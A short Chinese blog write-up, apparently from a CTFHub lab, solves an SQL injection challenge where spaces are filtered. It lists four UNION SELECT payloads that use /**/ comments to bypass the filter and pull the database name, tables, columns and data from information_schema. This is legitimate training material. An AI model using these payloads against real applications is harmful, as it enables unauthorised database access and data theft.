CTFHUB-SQL注入-过滤空格

燕雀安知鸿鹄之志哉.2024-08-15 10:09

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据

空格被过滤,使用 /**/ 绕过

查询数据库名

复制代码 
-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码 
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码 
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码 
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
智驱力人工智能7 分钟前
AI移动监测:仓储环境安全的“全天候守护者”
人工智能·算法·安全·边缘计算·行为识别·移动监测·动物检测
日出等日落13 分钟前
本地部署Immich系统结合Cpolar技术实现安全跨设备影像管理方案
安全
小赵面校招15 分钟前
Redis企业级开发实战:核心应用场景与最佳实践
数据库·redis·缓存
pp-周子晗(努力赶上课程进度版)37 分钟前
【MYSQL】基本查询,表的增删查改
数据库·mysql
AWS官方合作商1 小时前
AWS CloudHSM:金融级密钥安全管理实战,如何通过FIPS 140-2认证守护数据生命线?
安全·金融·aws
英英_1 小时前
详细介绍一下Python连接MySQL数据库的完整步骤
数据库·python·mysql
weixin138233951791 小时前
网络安全EN18031-1,EN18031-2,EN18031-3三个标准对应的测试项目
网络·安全·web安全
LabVIEW开发1 小时前
LabVIEW数据库使用说明
数据库·sql·labview知识
Python智慧行囊2 小时前
Python Django 的 ORM 编程思想及使用步骤
数据库·python·django·orm
苹果酱05672 小时前
Golang中的runtime.LockOSThread 和 runtime.UnlockOSThread
java·vue.js·spring boot·mysql·课程设计
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06Coze扣子平台完整体验和实践(附国内和国际版对比)07Ubuntu24.04安装中文输入法08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09DeepSeek各版本说明与优缺点分析10深度学习基础--ResNet网络的讲解,ResNet50的复现(pytorch)以及用复现的ResNet50做鸟类图像分类